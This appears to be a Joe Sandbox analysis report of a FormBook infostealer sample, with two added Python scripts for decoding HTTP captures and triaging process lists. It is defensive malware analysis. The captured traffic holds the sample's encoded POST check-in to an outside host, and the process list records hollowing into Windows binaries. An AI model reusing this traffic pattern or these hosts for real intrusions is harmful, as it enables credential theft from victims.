GET /yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.corpseflowerwatch.org
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36

Timestamp: Nov 18, 2024 16:29:02.658025980 CET
Bytes transferred: 416
Direction: IN
Data:
HTTP/1.1 200 OK
Server: openresty
Date: Mon, 18 Nov 2024 15:29:02 GMT
Content-Type: text/html
Content-Length: 276
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp"}</script></head></html>


Session ID: 50
Source IP: 192.168.2.6
Source Port: 50038
Destination IP: 217.70.184.50
Destination Port: 80

Timestamp: Nov 18, 2024 16:29:08.234448910 CET
Bytes transferred: 640
Direction: OUT
Data:
POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTGrpOIGrp9kVBNH52yhRNTqDlaRPCqLdMXnboLuoW7UJ

Timestamp: Nov 18, 2024 16:29:09.044819117 CET
Bytes transferred: 608
Direction: IN
Data:
HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 18 Nov 2024 15:29:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0
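The record above is the sandbox's capture of the contacted host answering the sample's POST with 501, so whatever the check-in carried was not serviced by that host at analysis time. To get a body back out of a Joe Sandbox Data Raw line it has to be hex-decoded, split at the header boundary and de-chunked. The following script is an added example, not Joe Sandbox code: the record it decodes is constructed to mirror this response (same status line and headers, a shortened body), and a dump cut off by a [TRUNCATED] marker is reported as an error rather than returned as partial data.

```python
"""Decode a Joe Sandbox 'Data Raw' HTTP record back into status, headers, body.

Added example; not part of the Joe Sandbox report. The sample record below is
constructed to mirror the 501 response in the report (same status line and
headers, shortened body) so that it runs offline; it is not the byte-exact
capture.
"""
from __future__ import annotations

# Constructed sample body and response; the report's real body is the XHTML
# error page shown above, this one is shortened to the same three elements.
SAMPLE_BODY = (
    b"<html><head><title>501 Unsupported method ('POST')</title></head>"
    b"<body><h1>Unsupported method ('POST')</h1>"
    b"<p>Server does not support this operation</p></body></html>\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 501 Unsupported method ('POST')\r\n"
    b"Server: nginx\r\n"
    b"Date: Mon, 18 Nov 2024 15:29:08 GMT\r\n"
    b"Content-Type: text/html\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    + f"{len(SAMPLE_BODY):x}\r\n".encode() + SAMPLE_BODY + b"\r\n"
    + b"0\r\n\r\n"
)
# Same layout as the report's 'Data Raw' field: space separated hex octets.
SAMPLE_DATA_RAW = " ".join(f"{b:02x}" for b in SAMPLE_RESPONSE)


def data_raw_to_bytes(data_raw: str) -> bytes:
    """Turn the report's 'xx xx xx' hex listing back into bytes.

    A '[TRUNCATED]' marker (Joe Sandbox cuts long records) is dropped; the
    bytes before it are returned and the caller sees the shortfall.
    """
    tokens = data_raw.replace("[TRUNCATED]", " ").split()
    return bytes(int(t, 16) for t in tokens)


def split_http(raw: bytes) -> tuple[str, dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into status line, header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body (RFC 9112 section 7.1).

    Each chunk is '<hex size>[;ext]\\r\\n<data>\\r\\n'; a zero-size chunk ends the
    body. A capture cut off mid-chunk raises ValueError instead of silently
    yielding a partial page.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated: missing chunk-size line")
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated: chunk shorter than declared size")
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("malformed: chunk data not terminated by CRLF")
        pos += 2


def decode_record(data_raw: str) -> tuple[str, dict[str, str], bytes]:
    """Full pipeline: hex listing -> status line, headers, de-chunked body."""
    status, headers, body = split_http(data_raw_to_bytes(data_raw))
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return status, headers, body


if __name__ == "__main__":
    status, headers, body = decode_record(SAMPLE_DATA_RAW)
    print(status)
    print(headers["server"], headers["transfer-encoding"], len(body), "body bytes")
    print(body.decode("iso-8859-15"))
```

Run it on the real record by pasting the page's Data Raw field into data_raw_to_bytes; because that dump is truncated, decode_record raises on it, which is the correct answer rather than a page that looks complete but is not.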


                                                                                                                                Target ID:0
                                                                                                                                Start time:10:24:56
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\Order No 24.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Order No 24.exe"
                                                                                                                                Imagebase:0x980000
                                                                                                                                File size:1'218'048 bytes
                                                                                                                                MD5 hash:E785B831C8183B40F176D34C36E8AD3E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:2
                                                                                                                                Start time:10:24:57
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Order No 24.exe"
                                                                                                                                Imagebase:0xb20000
                                                                                                                                File size:46'504 bytes
                                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:10:25:03
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe"
                                                                                                                                Imagebase:0xcc0000
                                                                                                                                File size:140'800 bytes
                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:4
                                                                                                                                Start time:10:25:10
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                                                                Imagebase:0x670000
                                                                                                                                File size:47'104 bytes
                                                                                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:7
                                                                                                                                Start time:10:25:22
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe"
                                                                                                                                Imagebase:0xcc0000
                                                                                                                                File size:140'800 bytes
                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:10
                                                                                                                                Start time:10:25:34
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                Imagebase:0x7ff728280000
                                                                                                                                File size:676'768 bytes
                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true
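The process list above carries the injection chain in its fields: Target ID 2 is svchost.exe from SysWOW64 whose command line is the original sample, the classic trace of process hollowing, and both that svchost.exe and net.exe (Target ID 4) have FormBook Yara hits in their memory although their images are Windows binaries; Target IDs 3 and 7 run the payload copied under a randomly named directory in Program Files (x86), and Firefox (Target ID 10) is started shortly after, consistent with the browser-credential signatures in the overview. The following script is an added example, not part of the report or of Joe Sandbox: it parses records in this Key:value layout and raises those flags mechanically. The embedded records are an abbreviated copy of the list above (Target IDs 0, 2, 3, 4 and 10); the directory-name threshold (24 letters, no spaces or digits) and the rule names are this example's own heuristics, and the original dropper (Target ID 0) is deliberately not flagged because it shows none of these traces.

```python
"""Triage a sandbox per-process list for hollowing, injection and persistence.

Added example; not part of the Joe Sandbox report or its tooling. The records
below are an abbreviated copy of the process list above, kept in the report's
'Key:value' layout so the parser also works on the full text.
"""
from __future__ import annotations
import ntpath
import re
from dataclasses import dataclass, field

SAMPLE_PROCESS_LIST = r"""Target ID:0
Start time:10:24:56
Path:C:\Users\user\Desktop\Order No 24.exe
Commandline:"C:\Users\user\Desktop\Order No 24.exe"
Has elevated privileges:true
Has exited:true

Target ID:2
Path:C:\Windows\SysWOW64\svchost.exe
Commandline:"C:\Users\user\Desktop\Order No 24.exe"
Has elevated privileges:true
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:3
Path:C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Commandline:"C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe"
Has elevated privileges:false
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:4
Path:C:\Windows\SysWOW64\net.exe
Commandline:"C:\Windows\SysWOW64\net.exe"
Has elevated privileges:false
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:10
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Has elevated privileges:false
Has exited:true
"""


@dataclass
class Proc:
    target_id: int
    path: str
    commandline: str
    elevated: bool
    exited: bool
    yara: list[str] = field(default_factory=list)


def parse_process_list(text: str) -> list[Proc]:
    """Parse blank-line separated 'Key:value' records; '•' lines are Yara hits."""
    procs: list[Proc] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields: dict[str, str] = {}
        yara: list[str] = []
        for line in block.splitlines():
            if line.startswith("•"):
                yara.append(line[1:].strip())
                continue
            key, _, value = line.partition(":")  # first colon only: paths keep 'C:\'
            fields[key.strip()] = value.strip()
        procs.append(Proc(
            target_id=int(fields["Target ID"]),
            path=fields["Path"],
            commandline=fields.get("Commandline", ""),
            elevated=fields.get("Has elevated privileges") == "true",
            exited=fields.get("Has exited") == "true",
            yara=yara,
        ))
    return procs


def image_from_commandline(cmdline: str) -> str:
    """First argv token of a Windows command line (quoted or bare path)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


WINDOWS_DIR = "c:\\windows\\"
# Heuristic of this example: a long, letters-only directory name with no
# spaces or digits, as dropped for persistence here.
RANDOM_DIR = re.compile(r"^[A-Za-z]{24,}$")


def triage(procs: list[Proc]) -> list[tuple[int, str, str]]:
    """Return (target_id, rule, detail) findings; paths compared case-insensitively."""
    findings: list[tuple[int, str, str]] = []
    for p in procs:
        img = p.path.lower()
        cmd_img = image_from_commandline(p.commandline).lower()
        if cmd_img and cmd_img != img:
            findings.append((p.target_id, "hollowing",
                             f"image {p.path} runs with command line of {cmd_img}"))
        if p.yara and img.startswith(WINDOWS_DIR):
            findings.append((p.target_id, "injected-system-binary",
                             f"{len(p.yara)} Yara hit(s) in {p.path}"))
        parent = ntpath.basename(ntpath.dirname(p.path))
        if RANDOM_DIR.match(parent) and not img.startswith(WINDOWS_DIR):
            findings.append((p.target_id, "random-install-dir", parent))
        if p.yara and not p.exited:
            dumps = [m.group(1) for h in p.yara if (m := re.search(r"Source: (\S+)", h))]
            findings.append((p.target_id, "dump-candidate", ", ".join(dumps)))
    return findings


if __name__ == "__main__":
    for tid, rule, detail in triage(parse_process_list(SAMPLE_PROCESS_LIST)):
        print(f"Target {tid:>2}  {rule:<24} {detail}")
```

The dump-candidate rule singles out processes that still ran at the end of the analysis with FormBook in memory (Target IDs 3 and 4 here), which is where the memory dumps named in their Yara Source fields come from.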


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:3.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                                  Signature Coverage:10.3%
                                                                                                                                  Total number of Nodes:2000
                                                                                                                                  Total number of Limit Nodes:155
execution_graph: interactive node/edge rendering, not reproduced as text. The node labels that name Windows API calls (the remaining nodes are call-graph addresses and CRT-internal symbols), grouped by purpose:
• Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
• Paths and modules: GetFullPathNameW, GetModuleFileNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetModuleHandleExW
• Dynamic import resolution: LoadLibraryA, GetProcAddress, FreeLibrary
• Environment probing: GetVersionExW, GetSystemInfo, GetNativeSystemInfo, IsProcessorFeaturePresent, IsThemeActive, SystemParametersInfoW
• Debugger and error handling: IsDebuggerPresent, MessageBoxA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RaiseException, GetLastError
• Process, heap and threading: GetCurrentProcess, TerminateProcess, ExitProcess, GetProcessHeap, RtlAllocateHeap, RtlFreeHeap, TlsAlloc, TlsSetValue, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, Sleep
• CRT start-up: GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType
• Token and UI: AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetSysColorBrush, LoadCursorW, LoadIconW
CRT-internal labels attached to the nodes include __cinit, __calloc_impl, __getptd_noexit, _memcpy_s, _wcscat, _wcscpy, __NMSG_WRITE, __RTC_Initialize, __wwincmdln, _wparse_cmdline, __ftell_nolock, std::exception::exception and Mailbox. The node list is cut off on the page after node 94181 (98518c).
calls 94179->94181 94182 98518c 48 API calls 94180->94182 94183 9f1d6a GetForegroundWindow ShellExecuteW 94181->94183 94184 9f1d54 94182->94184 94187 9f1d9e Mailbox 94183->94187 94186 98510d 48 API calls 94184->94186 94188 9f1d61 94186->94188 94187->94146 94189 98518c 48 API calls 94188->94189 94189->94183 94190->94129 94191->94134 94192->94136 94381 99e99b 94193->94381 94197 9861eb 94198 985374 50 API calls 94197->94198 94199 9861ff 94198->94199 94200 98ce19 48 API calls 94199->94200 94201 98620c 94200->94201 94398 9839db 94201->94398 94203 986216 Mailbox 94204 986eed 48 API calls 94203->94204 94205 98622b 94204->94205 94410 989048 94205->94410 94208 98ce19 48 API calls 94209 986244 94208->94209 94413 98d6e9 94209->94413 94211 986254 Mailbox 94212 98ce19 48 API calls 94211->94212 94213 98627c 94212->94213 94214 98d6e9 55 API calls 94213->94214 94215 98628f Mailbox 94214->94215 94216 98ce19 48 API calls 94215->94216 94217 9862a0 94216->94217 94417 98d645 94217->94417 94219 9862b2 Mailbox 94220 98d7f7 48 API calls 94219->94220 94221 9862c5 94220->94221 94427 9863fc 94221->94427 94225 9862df 94226 9862e9 94225->94226 94227 9f1c08 94225->94227 94229 9a0fa7 _W_store_winword 59 API calls 94226->94229 94228 9863fc 48 API calls 94227->94228 94230 9f1c1c 94228->94230 94231 9862f4 94229->94231 94233 9863fc 48 API calls 94230->94233 94231->94230 94232 9862fe 94231->94232 94234 9a0fa7 _W_store_winword 59 API calls 94232->94234 94236 9f1c38 94233->94236 94235 986309 94234->94235 94235->94236 94237 986313 94235->94237 94239 985374 50 API calls 94236->94239 94238 9a0fa7 _W_store_winword 59 API calls 94237->94238 94240 98631e 94238->94240 94241 9f1c5d 94239->94241 94242 98635f 94240->94242 94244 9f1c86 94240->94244 94248 9863fc 48 API calls 94240->94248 94243 9863fc 48 API calls 94241->94243 94242->94244 94245 98636c 94242->94245 94246 9f1c69 94243->94246 94249 986eed 48 API calls 94244->94249 94443 99c050 94245->94443 94247 986eed 48 API calls 94246->94247 94250 9f1c77 
94247->94250 94251 986342 94248->94251 94252 9f1ca8 94249->94252 94254 9863fc 48 API calls 94250->94254 94255 986eed 48 API calls 94251->94255 94256 9863fc 48 API calls 94252->94256 94254->94244 94259 986350 94255->94259 94260 9f1cb5 94256->94260 94257 986384 94454 991b90 94257->94454 94261 9863fc 48 API calls 94259->94261 94260->94260 94261->94242 94262 9863d6 Mailbox 94262->94143 94263 991b90 48 API calls 94264 986394 94263->94264 94264->94262 94264->94263 94266 9863fc 48 API calls 94264->94266 94470 986b68 48 API calls 94264->94470 94266->94264 94268 9840f2 __ftell_nolock 94267->94268 94269 9f370e _memset 94268->94269 94270 98410b 94268->94270 94273 9f372a GetOpenFileNameW 94269->94273 94271 98660f 49 API calls 94270->94271 94272 984114 94271->94272 94998 9840a7 94272->94998 94274 9f3779 94273->94274 94276 986a63 48 API calls 94274->94276 94278 9f378e 94276->94278 94278->94278 94280 984129 95016 984139 94280->95016 94284 98643d __ftell_nolock 94283->94284 95226 984c75 94284->95226 94286 986442 94297 983dee 94286->94297 95237 985928 86 API calls 94286->95237 94288 98644f 94288->94297 95238 985798 88 API calls Mailbox 94288->95238 94290 986458 94291 98645c GetFullPathNameW 94290->94291 94290->94297 94292 986a63 48 API calls 94291->94292 94293 986488 94292->94293 94294 986a63 48 API calls 94293->94294 94295 986495 94294->94295 94296 986a63 48 API calls 94295->94296 94298 9f5dcf _wcscat 94295->94298 94296->94297 94297->94153 94297->94161 94300 983ed8 94299->94300 94301 9f1cba 94299->94301 95280 984024 94300->95280 94305 983e05 94306 9836b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94305->94306 94306->94169 94308 985027 _memset 94307->94308 95285 984c30 94308->95285 94312 9850ca Shell_NotifyIconW 95289 9851af 94312->95289 94313 9f3d28 Shell_NotifyIconW 94314 9850ac 94314->94312 94314->94313 94316 9850df 94316->94171 94318 98e8f6 94317->94318 94350 98e906 Mailbox 94317->94350 94319 98ed52 94318->94319 94318->94350 95438 99e3cd 331 API calls 94319->95438 
94320 9ccc5c 86 API calls 94320->94350 94322 983e2a 94322->94146 94378 983847 Shell_NotifyIconW _memset 94322->94378 94324 98ed63 94324->94322 94326 98ed70 94324->94326 94325 98e94c PeekMessageW 94325->94350 95440 99e312 331 API calls Mailbox 94326->95440 94328 98ed77 LockWindowUpdate DestroyWindow GetMessageW 94328->94322 94331 98eda9 94328->94331 94329 9f526e Sleep 94329->94350 94333 9f59ef TranslateMessage DispatchMessageW GetMessageW 94331->94333 94332 98ebc7 94332->94322 95439 982ff6 16 API calls 94332->95439 94333->94333 94335 9f5a1f 94333->94335 94335->94322 94336 98ed21 PeekMessageW 94336->94350 94337 98ebf7 timeGetTime 94337->94350 94339 99f4ea 48 API calls 94339->94350 94340 986eed 48 API calls 94340->94350 94341 98ed3a TranslateMessage DispatchMessageW 94341->94336 94342 9f5557 WaitForSingleObject 94343 9f5574 GetExitCodeProcess CloseHandle 94342->94343 94342->94350 94343->94350 94344 98d7f7 48 API calls 94368 9f5429 Mailbox 94344->94368 94345 9f588f Sleep 94345->94368 94346 98edae timeGetTime 95441 981caa 49 API calls 94346->95441 94349 9f5733 Sleep 94349->94368 94350->94320 94350->94325 94350->94329 94350->94332 94350->94336 94350->94337 94350->94339 94350->94340 94350->94341 94350->94342 94350->94345 94350->94346 94350->94349 94354 982aae 307 API calls 94350->94354 94356 9f5445 Sleep 94350->94356 94364 981caa 49 API calls 94350->94364 94350->94368 94376 98d6e9 55 API calls 94350->94376 94377 98ce19 48 API calls 94350->94377 95312 98ef00 94350->95312 95319 98f110 94350->95319 95384 9945e0 94350->95384 95401 99e244 94350->95401 95406 99dc5f 94350->95406 95411 98eed0 331 API calls Mailbox 94350->95411 95412 993200 94350->95412 95442 9e8d23 48 API calls 94350->95442 95446 98fe30 94350->95446 94352 9f5926 GetExitCodeProcess 94357 9f593c WaitForSingleObject 94352->94357 94358 9f5952 CloseHandle 94352->94358 94354->94350 94355 99dc38 timeGetTime 94355->94368 94356->94350 94357->94350 94357->94358 94358->94368 94359 9f5432 Sleep 94359->94356 94360 9e8c4b 108 
API calls 94360->94368 94361 982c79 107 API calls 94361->94368 94363 9f59ae Sleep 94363->94350 94364->94350 94366 98ce19 48 API calls 94366->94368 94368->94344 94368->94350 94368->94352 94368->94355 94368->94356 94368->94359 94368->94360 94368->94361 94368->94363 94368->94366 94371 98d6e9 55 API calls 94368->94371 95443 9c4cbe 49 API calls Mailbox 94368->95443 95444 981caa 49 API calls 94368->95444 95445 982aae 331 API calls 94368->95445 95475 9dccb2 50 API calls 94368->95475 95476 9c7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94368->95476 95477 9c6532 63 API calls 3 library calls 94368->95477 94371->94368 94376->94350 94377->94350 94378->94146 94379->94153 94380->94165 94382 98d7f7 48 API calls 94381->94382 94383 9861db 94382->94383 94384 986009 94383->94384 94385 986016 __ftell_nolock 94384->94385 94386 986a63 48 API calls 94385->94386 94391 98617c Mailbox 94385->94391 94388 986048 94386->94388 94397 98607e Mailbox 94388->94397 94471 9861a6 94388->94471 94389 9861a6 48 API calls 94389->94397 94390 98614f 94390->94391 94392 98ce19 48 API calls 94390->94392 94391->94197 94393 986170 94392->94393 94395 9864cf 48 API calls 94393->94395 94394 98ce19 48 API calls 94394->94397 94395->94391 94396 9864cf 48 API calls 94396->94397 94397->94389 94397->94390 94397->94391 94397->94394 94397->94396 94474 9841a9 94398->94474 94401 983a06 94401->94203 94405 9a1c9d _free 47 API calls 94407 9f2ffd 94405->94407 94406 9f2ff0 94406->94405 94408 984252 84 API calls 94407->94408 94409 9f3006 94408->94409 94409->94409 94411 99f4ea 48 API calls 94410->94411 94412 986237 94411->94412 94412->94208 94414 98d6f4 94413->94414 94415 98d71b 94414->94415 94987 98d764 55 API calls 94414->94987 94415->94211 94418 98d654 94417->94418 94425 98d67e 94417->94425 94419 98d65b 94418->94419 94422 98d6c2 94418->94422 94420 98d666 94419->94420 94426 98d6ab 94419->94426 94988 98d9a0 53 API calls __cinit 94420->94988 94422->94426 94990 99dce0 53 API calls 
94422->94990 94425->94219 94426->94425 94989 99dce0 53 API calls 94426->94989 94428 98641f 94427->94428 94429 986406 94427->94429 94430 986a63 48 API calls 94428->94430 94431 986eed 48 API calls 94429->94431 94432 9862d1 94430->94432 94431->94432 94433 9a0fa7 94432->94433 94434 9a1028 94433->94434 94435 9a0fb3 94433->94435 94993 9a103a 59 API calls 3 library calls 94434->94993 94442 9a0fd8 94435->94442 94991 9a7c0e 47 API calls __getptd_noexit 94435->94991 94438 9a1035 94438->94225 94439 9a0fbf 94992 9a6e10 8 API calls _wprintf 94439->94992 94441 9a0fca 94441->94225 94442->94225 94444 99c069 Mailbox 94443->94444 94445 99c064 94443->94445 94451 99c077 94444->94451 94995 99c15c 48 API calls 94444->94995 94994 99c1af 48 API calls 94445->94994 94448 99f4ea 48 API calls 94450 99c108 94448->94450 94449 99c152 94449->94257 94452 99f4ea 48 API calls 94450->94452 94451->94448 94451->94449 94453 99c113 94452->94453 94453->94257 94453->94453 94455 991cf6 94454->94455 94458 991ba2 94454->94458 94455->94264 94457 991c5d 94457->94264 94459 99f4ea 48 API calls 94458->94459 94468 991bae 94458->94468 94460 9f49c4 94459->94460 94462 99f4ea 48 API calls 94460->94462 94461 991bb9 94461->94457 94463 99f4ea 48 API calls 94461->94463 94469 9f49cf 94462->94469 94464 991c9f 94463->94464 94465 991cb2 94464->94465 94996 982925 48 API calls 94464->94996 94465->94264 94467 99f4ea 48 API calls 94467->94469 94468->94461 94997 99c15c 48 API calls 94468->94997 94469->94467 94469->94468 94470->94264 94472 98bdfa 48 API calls 94471->94472 94473 9861b1 94472->94473 94473->94388 94539 984214 94474->94539 94479 9f4f73 94481 984252 84 API calls 94479->94481 94480 9841d4 LoadLibraryExW 94549 984291 94480->94549 94483 9f4f7a 94481->94483 94485 984291 3 API calls 94483->94485 94487 9f4f82 94485->94487 94575 9844ed 94487->94575 94488 9841fb 94488->94487 94489 984207 94488->94489 94490 984252 84 API calls 94489->94490 94492 9839fe 94490->94492 94492->94401 94498 9cc396 94492->94498 94495 9f4fa9 94583 984950 
